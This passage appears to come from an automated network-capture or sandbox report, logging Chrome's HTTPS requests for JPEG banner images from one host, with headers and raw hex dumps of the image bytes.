                                                      2025-01-12 23:48:00 UTC4096INData Raw: d9 c7 85 bb ca a4 ba a0 fc 4e 9e 49 62 0c 3c 4c 85 c8 37 bb 29 35 f8 46 92 3a 93 4c 08 0a 1d b8 05 0d 85 f0 4d 57 58 64 3b a5 5d 84 31 b6 ac 8e 61 30 67 5f 25 41 15 ed b0 c7 90 51 28 6e 68 34 5a 49 78 8d 99 82 45 9a 9a 70 6d aa 1c b8 35 68 9e 3b 66 f4 d0 ac 73 0a 67 82 99 d3 d2 80 b4 0c a5 a7 28 6b 36 65 8a 3b 58 6e 15 2c bc 98 67 2d d0 98 cd e5 77 69 56 22 9a 56 0f 16 24 d5 35 57 4b 2f 9b 8d 27 21 a6 8d 18 81 ab 55 3c a8 73 3b 62 01 d0 6c ec be b4 62 7f a9 56 c7 a5 80 f3 a5 1e 9b b0 1b 8e cc 7a a7 01 e5 26 04 5d 63 8f cf 25 2d 57 eb 27 6c 6d e2 dd e4 03 e8 c4 23 6e 8d 31 23 f6 57 83 fc 8e 78 a8 7d 20 a9 07 e4 e6 c8 2b d6 40 20 33 51 a2 35 eb 62 c3 65 0d 6f 7c 3b c5 5d 75 48 70 ea 50 84 40 72 88 d2 22 23 0a ab 5f fd 41 78 3e f9 ff c4 00 35 11 00 01 03 03
                                                      Data Ascii: NIb<L7)5F:LMWXd;]1a0g_%AQ(nh4ZIxEpm5h;fsg(k6e;Xn,g-wiV"V$5WK/'!U<s;blbVz&]c%-W'lm#n1#Wx} +@ 3Q5beo|;]uHpP@r"#_Ax>5
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 35 b5 05 c0 0a 3b 8e 7e d0 03 93 fa bd 5a ff 00 ca 36 ac 70 8e fd eb 8a c8 87 41 83 16 5c af 03 1f a9 b9 cd 52 9b 43 3c 25 28 2e d8 60 46 bd da 19 33 01 3a d1 84 de 12 b0 6c a4 81 bb 78 70 20 06 7b d4 22 87 29 c6 1b 3f 68 ad 3f 50 a1 8c ff 00 6b a3 f5 23 63 13 f9 75 fa 93 b4 8d b2 d1 ef 14 6f bb 93 6a 12 d4 e1 14 e4 bc c8 e6 ae 58 68 a0 43 83 17 88 d3 3f e9 27 5d ff 00 b9 81 d8 01 32 ca eb 78 f0 1e 6a 2a 85 a1 fe 4f 64 40 3e f7 da e8 40 95 a8 7b b4 74 c8 cb 5c 6b 23 2e 8e ba 59 d7 4e 78 b9 57 ab 58 de ac 06 40 21 82 87 ac 0f 40 a4 6d 90 9b 75 59 f7 13 78 3d 35 66 60 4e c3 3c a6 5a 34 91 64 cd ed 5d 8a 3d e3 96 84 2d 5b 66 a9 9f 94 c1 79 ac 2f 98 61 a9 ab 53 7c a4 65 b4 46 3d a8 a8 1b e2 54 06 7b 85 31 77 f8 54 88 3f 2a 9b be 19 c0 9b 74 1c 57 85 32 69 7f
                                                      Data Ascii: 5;~Z6pA\RC<%(.`F3:lxp {")?h?Pk#cuojXhC?']2xj*Od@>@{t\k#.YNxWX@!@muYx=5f`N<Z4d]=-[fy/aS|eF=T{1wT?*tW2i


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      115192.168.2.44986420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC386OUTGET /images_plus/other/banner2.jpg?ver=1606891698 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 32120
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:18 GMT
                                                      ETag: "5fc738b2-7d78"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 02 02 02 02 01 02 02 02 02 03 02 02 03 03 06 04 03 03 03 03 07 05 05 04 06 08 07 09 08 08 07 08 08 09 0a 0d 0b 09 0a 0c 0a 08 08 0b 0f 0b 0c 0d 0e 0e 0f 0e 09 0b 10 11 10 0e 11 0d 0e 0e 0e ff db 00 43 01 02 03 03 03 03 03 07 04 04 07 0e 09 08 09 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 03 02 04 05 06 07 08 09 01 0a ff c4 00 1c 01 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 02 04 05 06 07 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fe 7f
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 5f 73 b0 46 d7 99 53 20 65 0e 95 15 9d 98 92 f0 e4 6c 3c f7 b1 2e 73 59 c8 24 a4 b8 52 23 f4 11 96 aa 46 46 52 46 00 00 00 00 00 00 00 04 80 12 00 48 09 0a 89 93 17 00 90 52 64 e6 2a 24 2a 4e 42 4d 84 93 9c 89 cc 5c 11 d2 75 15 27 21 4a 75 15 27 4a 82 40 46 08 d4 85 4b 79 ad 5b 16 ec ba 16 be e7 68 d7 be 69 9f 50 21 38 7e 53 f3 dd e1 ac e7 2a 80 29 05 2a 55 82 9f ca 52 0b 12 dd 48 ca 48 c0 00 00 00 00 00 00 00 a8 a8 a8 a8 15 15 15 15 12 12 27 70 0a 8a 93 aa 93 90 a8 91 8c cc 6a 26 a4 e4 4e 42 a2 4a 4c 48 99 3b 82 a4 e9 24 2a 64 63 20 00 11 94 90 b2 b5 5a de 74 b3 a6 c5 ac f2 e8 1a fb 1d 1a 79 70 9d 88 e3 f6 31 93 00 06 29 23 52 96 54 91 90 a9 24 e9 09 6e 42 5b a9 19 18 00 00 00 00 00 00 00 15 15 12 00 48 09 09 09 13 fd 2e 0f d0 9d 54 9c 84 84 84 c9 d5 54
                                                      Data Ascii: _sFS el<.sY$R#FFRFHRd*$*NBM\u'!Ju'J@FKy[hiP!8~S*)*URHH'pj&NBJLH;$*dc Ztyp1)#RT$nB[H.TT
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 8d 62 c6 d9 d2 48 dd d7 c6 a4 8d ee 45 9f 3d 73 e8 00 37 36 34 6d a0 5a e2 c2 f6 ee 3e 9d 19 cc 27 90 b5 bc 6f 07 a0 21 61 24 ac 32 d7 2b e0 fe 1c 68 4e b0 dd 48 01 e1 f3 e9 b1 58 90 63 49 25 d1 8b 80 fb e6 ab a0 7b ba 27 e2 4c 38 a6 d9 12 67 d6 a0 2c 6b 58 15 89 0a b2 93 68 a4 2a 47 45 36 1a 3f f4 eb c2 cb 23 ce 78 8b 24 05 0d af 7e c2 95 05 40 c3 63 46 0b f0 33 a8 15 01 3b 95 ff 00 d1 46 8e 80 8c f1 8f 60 dd 0e a2 da db 8c b0 80 67 32 eb 90 dc 8c 8e fe 9d b4 94 e3 b8 0e 18 ef f9 94 ad d9 b5 a5 18 cc 77 74 46 da 41 99 83 1c 75 97 21 04 88 c7 e5 8e 25 34 4f de 91 8d ef 0f bf 18 09 5e 0f 70 58 8f 7c 55 f9 1b f1 b2 48 52 e6 1c 8a dc d6 d6 c2 76 31 40 b5 da 6f 16 ca 27 a3 74 7e 5d c1 28 61 39 e9 4a 28 58 d7 44 66 d2 59 76 21 c5 6c 99 1d fd 91 60 85 8f 5e d9
                                                      Data Ascii: bHE=s764mZ>'o!a$2+hNHXcI%{'L8g,kXh*GE6?#x$~@cF3;F`g2wtFAu!%4O^pX|UHRv1@o't~](a9J(XDfYv!l`^
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 8e 4a 9f 4a fa ad 22 4d 25 80 35 c6 ce 6d 86 c5 f4 4c 74 49 8c 63 c9 f9 99 ae 0e d1 78 0e 84 20 6b 0f 35 e5 e1 e3 2a 2f fe d6 b8 4b 1a 73 83 11 60 78 eb 09 d2 5d 75 e6 c9 0e f2 9b 5d 09 60 22 47 92 32 14 c5 45 ce 92 c8 1c 9e 86 13 97 1a 0d 9c de 4e 1f de 65 5c e2 7e f0 00 ce 41 fb e1 fc 04 f1 d7 11 df bc e2 c3 41 24 91 0f de 72 1d 5f 02 6b 80 a4 e1 0d 5c 27 ec f3 9d c2 03 09 4b d6 5c 66 8b 98 76 2a c6 ed 02 74 7c d4 51 0b 06 3b 83 aa 25 2d 5d b9 21 4a 41 bc c1 38 1d c2 62 c5 37 3d 67 f1 86 e5 fc 93 17 89 40 de 5a 16 ac f1 49 4f b5 ba b7 56 ea dd 5b ab 75 04 74 1b d1 77 ff 00 1a 22 f4 45 fc e0 1d 27 b8 69 3d c3 44 6d df 45 77 70 51 57 b5 72 db f9 6a e6 5a 8c 32 8d 32 dc 06 51 b7 fe aa 3c 54 79 94 71 81 a3 ef fb 28 c1 ff 00 e1 7b d5 c5 bc 77 ec db 5b 6b 67
                                                      Data Ascii: JJ"M%5mLtIcx k5*/Ks`x]u]`"G2ENe\~AA$r_k\'K\fv*t|Q;%-]!JA8b7=g@ZIOV[utw"E'i=DmEwpQWrjZ22Q<Tyq({w[kg
                                                      2025-01-12 23:48:00 UTC4096INData Raw: fc 89 e6 8a b4 ff 00 65 b5 c2 c6 bd 9f 81 7e fc bf 92 d3 8d 06 3a 86 3b 22 ab 1c d4 ad f1 cd 4e 98 ed 02 a4 73 d3 1c f4 c6 e7 0a 59 24 24 01 84 36 e6 51 c7 84 09 48 b5 a5 c8 50 0e 28 a2 93 6a 89 a1 6e 81 9e 59 16 1a b4 a7 ae 9b 99 79 00 4d 70 98 d0 aa 28 86 17 94 5b e5 fd 57 6b c8 12 93 4e f3 a7 52 a2 12 2c 5b b6 4b 33 ec b5 69 be 4c 50 8e 02 1d 2a a5 12 98 4a dd b1 63 3f 8d 2a fd 6d 0b 8a 82 5c 74 a9 50 bd a1 85 e2 11 bd 61 75 29 b6 a9 09 c6 2d 2a a4 73 53 a6 13 5a e1 ac 0e b2 46 d7 fb 0b 37 60 be bb 9d 9c 39 b7 9a 39 39 a1 45 b8 84 40 c4 5c e9 67 42 d8 8b 4e 79 eb 2b 72 cf be e3 cd 2c 8c c0 b0 6e 57 48 90 a1 e9 50 da e8 43 76 e4 bd 9d 63 04 eb ef b0 80 55 29 3c 99 0c 6f 55 15 89 f9 36 ad 63 91 07 dd 56 b7 b8 b2 a4 61 8a a4 a7 71 93 67 ca e5 c5 aa c4 bd
                                                      Data Ascii: e~:;"NsY$$6QHP(jnYyMp([WkNR,[K3iLP*Jc?*m\tPau)-*sSZF7`999E@\gBNy+r,nWHPCvcU)<oU6cVaqg
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 12 dc 69 77 4e 31 20 59 5e e8 5f 27 3c 47 5d 6b 76 90 1a 76 6e d9 8c 75 de 75 34 f9 67 a7 4f c5 5f c5 cf 0b 30 c5 d7 0b a3 9f 0b 3f c6 e6 89 79 c2 26 a4 99 b8 1d 74 d0 0d 97 d1 12 fa 95 17 6f 4c 4b c8 b0 db 92 0e 66 36 1b 16 80 ab bb 42 de 6b 42 0d df bd 07 6a 4a 61 20 12 d4 88 52 8f e8 be 1c 2c 36 db 06 ab 27 09 57 52 24 7f c0 9f d9 8d fd 34 b3 2d 3a c1 d4 ad 2b 61 56 5b af d5 09 a9 d7 6c a2 95 97 bf 9f 08 12 a3 f3 d1 15 5e c4 9a 48 9b 6c 35 e2 14 1b bd 2d a8 ff 00 81 77 ec c2 09 1b 8e 1c 89 d2 02 99 ba 30 9f 7b 98 91 65 c4 e0 b3 20 28 5e 89 78 55 f5 63 c1 cb ce 29 37 ec 7f db 01 f1 8d 5a d2 68 0f 53 d7 75 cb 0e 0e 1a ce 58 0e 89 8f ab 44 2b 38 69 25 6f b0 22 54 29 69 6e b3 1f 6a 98 6d 9a 9b 9f b0 5f a1 ec 55 53 ad db eb a8 ef 4d 98 c1 20 76 cf b6 e4 7b
                                                      Data Ascii: iwN1 Y^_'<G]kvvnuu4gO_0?y&toLKf6BkBjJa R,6'WR$4-:+aV[l^Hl5-w0{e (^xUc)7ZhSuXD+8i%o"T)injm_USM v{
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 9a cd f4 47 3b ae 88 ff 00 18 e3 a1 af da 51 db cd fc 12 38 bf fe 24 2f 42 e1 8f 6b e7 58 ed d4 5f 45 d0 7c 43 70 fc c9 1c b0 97 fa 2f 80 f8 86 bb cb 43 c4 9d 71 3f 22 f4 bc bc 94 bb bf 83 62 01 02 38 7c d7 7e 40 4f 92 7e 6d 31 9d a8 5e 5a e6 64 8b c7 ad 21 7e 2d c6 9d a8 5c f1 2a 43 73 92 d7 79 c4 fe 0e 36 e5 df 51 6f d8 d5 1c 6e 1b 1b dd ef 5b 77 27 bb 0d 95 38 86 c2 4d 33 eb 0b 8b dd 87 ed e6 5c 6d a9 77 f3 d2 2c 3c 2b 78 10 a2 a6 b0 da 80 b4 1e ba 87 6a d6 ba 21 be f8 d6 5a fa 97 9d 22 ad 13 a1 f8 3b a5 ce a9 de d7 dd 85 cc d4 ec bf 2f af 46 bf 46 3b dd a1 2f f1 80 3f 41 c1 e4 59 99 7f a1 c0 2f de 18 6f 43 60 eb a5 c1 0f e8 dc cc 4d 79 25 53 70 db 78 8f c9 34 ed 2f 53 ad 6b 66 a5 17 5b ed 85 43 e4 42 50 2c 35 60 3e 32 62 63 c6 e1 ab 40 85 7d fc 98 3a
                                                      Data Ascii: G;Q8$/BkX_E|Cp/Cq?"b8|~@O~m1^Zd!~-\*Csy6Qon[w'8M3\mw,<+xj!Z";/FF;/?AY/oC`My%Spx4/Skf[CBP,5`>2bc@}:
                                                      2025-01-12 23:48:00 UTC3805INData Raw: 39 38 ae 3e 4c 94 b9 27 ab 53 5c b2 ac a9 c5 d7 2a ab b5 97 89 25 24 c5 77 64 22 db a6 29 29 2a ab b7 62 4d fa 39 e4 a6 a4 b8 eb c3 a7 3d 18 9a df da d5 a9 aa ad da 55 12 c4 9a 24 5d a5 7a ec 81 40 fa 7c 4e 3c 8e 53 4d 6f 89 c1 c9 b9 74 dd 52 58 8a aa d2 8b ba d6 e5 2a ae df c2 b8 f9 4d ee a2 0b 69 55 ba 31 18 4b 13 55 34 82 8f 56 ba 6c aa bb 92 ae d2 4c 4d 71 53 7c 26 b9 14 a5 10 89 94 45 08 82 9f b1 70 bb 81 55 a6 27 c5 0d d9 44 8c f2 ab 67 ed 2b a7 6c e9 2f 25 a8 57 85 12 98 8a 9e 24 d6 a3 72 cf 47 0b 97 8e b1 51 d6 0a 1c 93 4e 51 4d 6e 8d f0 9a e4 fb 93 17 ea 11 ca 25 57 2c cf 55 7e 52 e5 55 39 8a 88 6c bd d0 dc 3c 48 97 4f 2f 77 c6 82 87 30 6e 0a 24 d7 08 bd db b6 ed 73 c9 77 15 5b a4 54 7a 15 e4 86 b0 50 f0 6b 55 52 15 66 7a e3 ad 1a a2 b8 69 25 5a
                                                      Data Ascii: 98>L'S\*%$wd"))*bM9=U$]z@|N<SMotRX*MiU1KU4VlLMqS|&EpU'Dg+l/%W$rGQNQMn%W,U~RU9l<HO/w0n$sw[TzPkURfzi%Z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      116192.168.2.44986620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC386OUTGET /images_plus/other/banner5.jpg?ver=1606891700 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 56687
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:20 GMT
                                                      ETag: "5fc738b4-dd6f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 08 02 03 07 09 04 05 06 01 0a ff c4 00 1d 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 02 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fc
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 9b 67 87 ba cd d5 5f 69 34 63 fa 43 bd fd 8d c7 2f fd 3e 7e 3e 72 27 5f 71 a8 e2 dc a9 ff 00 2a 3f a3 1b 8b f5 83 f9 63 a9 22 ae f4 bd c2 0d d7 4b 77 02 9f 6b 5c 7d e7 56 7d 65 72 d8 27 31 fc d3 17 7d c1 bf ff 00 c7 8f 7f 9f df d8 dd 7d d0 fd d0 51 e6 a3 38 eb fe f5 5e f2 34 76 41 8c 36 47 37 ea cf 38 d4 b1 07 2a cc 2d 80 0a 4a 41 51 50 00 e4 23 e4 49 04 85 ba eb 3d 9c 5c b5 d6 15 ad c4 64 ec 75 50 ca 3a ec be fb e2 24 a0 9f 95 78 ec 5c a7 bc 45 d8 6e f3 ca bb 10 c0 92 53 e7 9f 92 57 2e 39 ed 68 36 3e b3 a9 ee d2 09 4d e3 a4 8e 54 a5 ce 5e 3c 70 3e 56 e9 fa dd 9a 43 3b 3e e5 e1 f8 aa e3 47 ee da 40 00 fa 56 0a cf d4 a7 25 75 36 85 ba 13 99 fc 45 f3 0c ef eb b3 3f 2b 5d 43 27 30 bb 07 ae c6 b0 1f 63 47 d1 bf a0 2f c8 3c bb 50 3f af b7 5d bb fe 4a db 75 8d
                                                      Data Ascii: g_i4cC/>~>r'_q*?c"Kwk\}V}er'1}}Q8^4vA6G78*-JAQP#I=\duP:$x\EnSW.9h6>MT^<p>VC;>G@V%u6E?+]C'0cG/<P?]Ju
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 50 9a f1 23 6d bc 8c 11 38 dd ae cb 48 99 1d 1e 4b 32 b6 4e c4 30 e6 07 39 70 ab c3 6d db f2 85 9d 10 72 96 13 6f 13 e9 70 3b 71 92 56 40 ac 56 b5 ce 7b 30 a5 0e 56 e0 f4 23 4b fc 57 b9 12 83 28 f7 46 e5 8a 37 21 9c 5b 48 af fc 72 fc 1a 50 80 ee c5 54 92 15 94 e4 1e 4f 6b bb 90 cc 9f 62 38 b0 71 e6 56 2b bc dc 7e 4f 88 47 e2 b3 f3 28 6c c1 1b b3 dd 67 88 d9 e5 36 87 60 36 52 02 82 92 3c 39 61 84 39 0d ce 51 f2 6b b5 1c cf 87 76 b4 af af af b8 91 a7 c7 62 62 25 b9 82 46 ad 73 f3 86 1e 08 e8 86 4a fc c4 52 1e d6 59 2c 99 b8 9d 1b 46 b2 7c 31 00 b4 1c 48 2b 04 fd 59 d0 7a d5 1b d9 eb 60 70 f1 11 94 9c cd 05 d2 68 4d c4 7c ca 86 11 70 42 93 80 49 74 00 65 3c b0 41 2a 90 b7 f0 79 c8 36 4d 1b c8 13 13 d8 93 cb 70 16 d4 a2 a8 49 3c 2e 90 3f 28 86 e7 54 41 df 7f
                                                      Data Ascii: P#m8HK2N09pmrop;qV@V{0V#KW(F7![HrPTOkb8qV+~OG(lg6`6R<9a9Qkvbb%FsJRY,F|1H+Yz`phM|pBIte<A*y6MpI<.?(TA
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 2f d2 2e aa 95 8c 54 85 96 c2 54 20 74 52 c3 d8 de 52 25 79 e5 7f 17 33 f9 e8 75 5d 4b 8a fe 4c 63 ba ea b8 65 d1 25 47 29 ce 60 b9 02 e7 22 46 9c 93 07 6c 15 52 09 1d 02 03 e4 29 e6 d2 91 8a 39 88 b8 8c 91 33 69 79 a1 6b 58 5a d8 8e d7 76 47 c9 3f 2a a4 2e 46 df 3e c7 cd 9a 41 78 ee e9 d4 2a f8 a5 b3 e5 74 67 9c 84 40 05 62 16 8b 9b 78 54 d5 72 70 c3 50 3c 2a 49 ac 5e 5c 9e 17 0d 48 82 2d 25 9c 13 a1 b5 c8 74 88 83 19 1e 61 86 bc 78 12 12 bb d1 46 40 5c 1d 40 cf bf ac d3 ff 00 ca d6 64 f5 99 31 3f ba d6 78 64 1f bb f3 33 ed fd 3d 9f 99 9f cd 0f f5 d5 2d 6f 86 65 9a 53 63 20 fd 54 f4 eb 01 08 81 a3 38 8b dc d4 7c ec 3e 16 7b f7 4e 74 0a 9d 22 7c a2 72 6e ed 41 26 59 08 e5 56 b7 0b 0c de fa 20 4a 42 27 90 bc 2b 0a 06 9e e2 37 08 2c 79 c6 fc 4c d7 44 78 cc
                                                      Data Ascii: /.TT tRR%y3u]KLce%G)`"FlR)93iykXZvG?*.F>Ax*tg@bxTrpP<*I^\H-%taxF@\@d1?xd3=-oeSc T8|>{Nt"|rnA&YV JB'+7,yLDx
                                                      2025-01-12 23:48:00 UTC4096INData Raw: d8 11 03 a1 67 e1 d7 85 51 23 bb 9d 85 58 d7 22 a7 03 6d d1 69 5d 5f 5e 1a 44 8d 95 f9 51 42 3f d1 f4 06 9f 80 25 7b bb eb c4 93 91 a5 ee 52 11 9b 24 06 e8 de 1e 82 69 83 3a 09 38 a4 a9 25 22 e2 ef 91 a3 f2 f9 32 07 91 48 0c 11 c0 e3 50 0f 96 2b 92 b1 96 cf 9b 29 c6 bc 75 08 a3 53 e4 85 98 bd 2c 4e ed 9b 27 15 9f 93 49 af 49 6e b2 c8 e5 f9 5d 4d 8f 4f 48 e0 3b 5a eb 04 4e 2c f6 bf 6f cd ed fa 43 fd 7e 71 51 3e 0d 53 fb 08 24 40 e5 2e a9 81 d1 4b 0c ea f1 15 58 d5 86 60 28 65 a4 82 c4 73 66 f2 44 a7 22 be 33 52 78 ba 8c 28 9a e4 97 96 28 d2 7f 69 35 cd 31 11 ce a5 0b 15 f2 3e eb 67 3b 82 58 47 72 18 20 66 db 72 f1 27 d9 48 d1 21 9e fc 74 e0 70 2a 2f 6a 92 18 52 e2 3b c9 78 6e f1 79 0b 96 18 c8 f5 99 23 62 9b 2d 52 c2 17 bf fc 9d 2e 58 f7 99 a7 31 f3 dd 80
                                                      Data Ascii: gQ#X"mi]_^DQB?%{R$i:8%"2HP+)uS,N'IIn]MOH;ZN,oC~qQ>S$@.KX`(esfD"3Rx((i51>g;XGr fr'H!tp*/jR;xny#b-R.X1
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 96 d0 84 42 10 2f ad d0 5b 2c a5 86 21 42 07 05 ed 41 f6 6a 75 ad 6b fb ba 20 d9 69 da c7 52 68 f8 84 af b7 68 b2 4c d4 bd 19 cb a5 48 f3 47 5e d7 4e 62 7e 56 e1 fe 0f 55 15 cf cd fd 31 71 b4 89 37 95 38 8d cd 48 98 dc e9 35 18 c0 08 34 2f c5 5d 71 6d 8b 27 f3 ed c9 d3 fd 07 36 b2 05 83 0e 3d 46 75 c8 2f 17 bb 88 67 8b c9 7c f2 da c1 8d d4 15 07 10 d1 f1 45 18 50 91 b5 b2 50 61 6b d9 a1 6b 34 e0 3e 9d 79 00 f4 11 70 b5 da fd ba ed 7e dd 76 f5 98 7a 1c 3d c5 d0 25 c4 db 6d f5 db d5 3c e4 b1 e9 58 a1 91 e1 81 d5 97 fd 8c 39 c3 0a 67 07 3e 6b e3 d7 6b f6 eb a3 7f 48 9f ae b7 f8 b7 ff 00 c1 3b 7a e8 df 41 05 f7 eb a7 5d bf 47 6b f6 eb 3c 3b be b0 b5 e4 f4 10 7a ed 7e dd 74 05 a0 83 d7 46 fa 08 3f bf 5d 1b 68 20 b4 11 7d 76 37 fe d6 fa ed 7e dd 74 eb a7 d1 89
                                                      Data Ascii: B/[,!BAjuk iRhhLHG^Nb~VU1q78H54/]qm'6=Fu/g|EPPakk4>yp~vz=%m<X9g>kkH;zA]Gk<;z~tF?]h }v7~t
                                                      2025-01-12 23:48:00 UTC4096INData Raw: b3 90 f6 08 f8 d9 d7 80 6a 53 12 4e a8 ed 9b b0 ae 77 90 ef df c8 b1 39 aa 6d 56 24 04 fd aa 05 7f ae b6 de 21 76 0a 99 b5 48 a6 a1 23 d9 15 a1 f2 64 b1 f0 db 87 b7 6a 02 b5 0c 01 68 21 5e 2b 56 ce 3c b1 52 ca 31 f7 7d 3b 56 64 54 22 51 f1 65 a2 05 6d be 6e 38 a3 a9 39 6a 13 ac 69 91 a4 56 e2 27 3f 57 bb 0e ad 17 d7 dc 17 7c e0 e3 91 3b d0 07 a6 e9 6a 06 ca fc 55 36 a5 f2 4d 2f 28 15 87 ed e3 4a c9 ef b5 ad 29 5c a4 a2 2c fa b2 01 46 24 a8 b2 08 43 74 bc 6b f3 f8 30 9e 41 a7 bb d9 16 f8 1f ac 5b 5d f7 08 5a 43 7f 1e 8f 54 cc 2a 92 51 22 82 e7 ed 29 82 06 7c b9 0f 2b 6e c0 cf 6c 41 a8 94 52 14 1b 43 3e c2 11 2e 9f eb 2b d5 54 c2 5c fa 8b 0c 51 17 36 1f 66 eb 08 47 32 b0 3a b3 b7 2c 40 ab c7 3c ab 54 c5 12 f7 e4 c5 e2 2f d9 2e 56 92 fa bd 8c 46 f5 fa 8e 4d
                                                      Data Ascii: jSNw9mV$!vH#djh!^+V<R1};VdT"Qemn89jiV'?W|;jU6M/(J)\,F$Ctk0A[]ZCT*Q")|+nlARC>.+T\Q6fG2:,@<T/.VFM
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 7a 07 19 d6 9b 1b 4c c3 62 44 cd 73 64 46 74 74 bd 77 74 90 6e 5c 25 85 19 cc ca 65 11 cd 7b e8 db bc 9c 0c 12 1c 89 ab bb b4 ae 5e 27 00 32 75 61 7a 9a 08 94 8b 47 8e e1 5f da 65 96 3d 11 ea 38 d5 28 f5 3d a3 57 c2 93 06 4a 89 cf 01 2e c2 db 15 ae c0 bb db f3 e0 23 ee 04 40 d3 55 1c 88 ce db ad f9 0b 6e c5 7f 53 be b3 ba b6 72 45 cd cd 83 69 7b 1c 31 4f 8d 92 d1 5f a4 d5 b2 8b df c7 21 b4 49 eb 62 cf d6 79 88 71 a2 9d 3a 2a 29 d0 f7 1e ba 54 49 11 9c b6 38 ed 1b da c3 22 0b ad 1c 50 2b 32 26 b6 bf 58 50 a0 66 1e 68 35 64 0b 4f c6 56 fb 45 f5 71 2a a5 56 95 fc f3 9a 3f aa 38 7e a8 75 81 fe 3c f1 4e d1 70 69 b3 eb 35 f0 5a a1 41 94 b8 ca 5b 08 6c 2c d9 20 2e 0f 63 1a d1 cf 8b e9 08 82 dd e6 a9 84 24 2e 58 f4 fa a2 10 b4 7c bc 31 26 b7 4e a9 6a da b4 c8 8d
                                                      Data Ascii: zLbDsdFttwtn\%e{^'2uazG_e=8(=WJ.#@UnSrEi{1O_!Ibyq:*)TI8"P+2&XPfh5dOVEq*V?8~u<Npi5ZA[l, .c$.X|1&Nj
